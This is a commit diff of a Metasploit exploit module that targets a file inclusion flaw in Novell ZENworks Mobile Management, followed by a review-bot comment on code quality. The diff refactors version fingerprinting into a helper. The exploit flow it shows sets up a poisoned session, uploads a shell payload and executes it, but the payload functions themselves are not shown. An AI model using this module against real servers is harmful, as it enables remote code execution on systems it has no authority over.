
Commit a270d37

committed
Take apart the version detection code
1 parent 25fe03b commit a270d37


1 file changed

+28
-19
lines changed


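--- a/modules/exploits/windows/http/novell_mdm_lfi.rb
+++ b/modules/exploits/windows/http/novell_mdm_lfi.rb
@@ -52,6 +52,21 @@ def peer
 "#{rhost}:#{rport}"
 end
 
+def get_version
+version = nil
+
+res = send_request_raw({
+'method' => 'GET',
+'uri' => target_uri.path
+})
+
+if (res and res.code == 200 and res.body.to_s.match(/ZENworks Mobile Management User Self-Administration Portal/) != nil)
+version = res.body.to_s.match(/<p id="version">Version (.*)<\/p>/)[1]
+end
+
+return version
+end
+
 def setup_session()
 sess = Rex::Text.rand_text_alpha(8)
 cmd = Rex::Text.rand_text_alpha(8)
@@ -104,28 +119,22 @@ def exec_shell(session_id,cmd_var,fname)
 
 
 def exploit()
-uri = normalize_uri(target_uri.path)
 begin
-res = send_request_raw({
-'method' => 'GET',
-'uri' => uri
-})
-
-if (res and res.code == 200 and res.body.to_s.match(/ZENworks Mobile Management User Self-Administration Portal/) != nil)
-print_status("#{peer} - Found Zenworks MDM, Checking application version")
-ver = res.body.to_s.match(/<p id="version">Version (.*)<\/p>/)[1]
-print_status("#{peer} - Found Version #{ver}")
-print_status("#{peer} - Setting up poisoned session")
-session_id,cmd = setup_session()
-print_status("#{peer} - Uploading payload")
-fname = upload_shell(session_id,cmd)
-print_status("#{peer} - Executing payload")
-exec_shell(session_id,cmd,fname)
-else
-print_error("#{peer} - Zenworks MDM does not appear to be running at #{rhost}")
-return :abort
+print_status("#{peer} - Checking application version...")
+v = get_version
+if v.nil?
+print_error("#{peer} - Unable to detect version, abort!")
+return
 end
 
+print_good("#{peer} - Found Version #{v}")
+print_status("#{peer} - Setting up poisoned session")
+session_id,cmd = setup_session()
+print_status("#{peer} - Uploading payload")
+fname = upload_shell(session_id,cmd)
+print_status("#{peer} - Executing payload")
+exec_shell(session_id,cmd,fname)
+
 rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
 rescue ::Timeout::Error, ::Errno::EPIPE
 rescue ::OpenSSL::SSL::SSLError => e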
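Review bot: In the new `get_version`, the version regex result is indexed with `[1]` without checking that it matched, so a response that carries the portal banner but no `<p id="version">` element raises NoMethodError, which none of the visible `rescue` clauses in `exploit` catch. Using `version = res.body.to_s[/<p id="version">Version (.*)<\/p>/, 1]` returns nil on a miss and lets the caller's `v.nil?` branch report it. The helper also sends `target_uri.path` as-is, whereas the removed code went through `normalize_uri(target_uri.path)`; unless that was dropped on purpose, `'uri' => normalize_uri(target_uri.path)` keeps the request path handling as it was. A short comment on `get_version` stating that it returns the version string, or nil when the banner is absent or the request fails, would document the contract `exploit` now relies on. The `rescue` chain of `exploit` continues past the end of the hunk.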
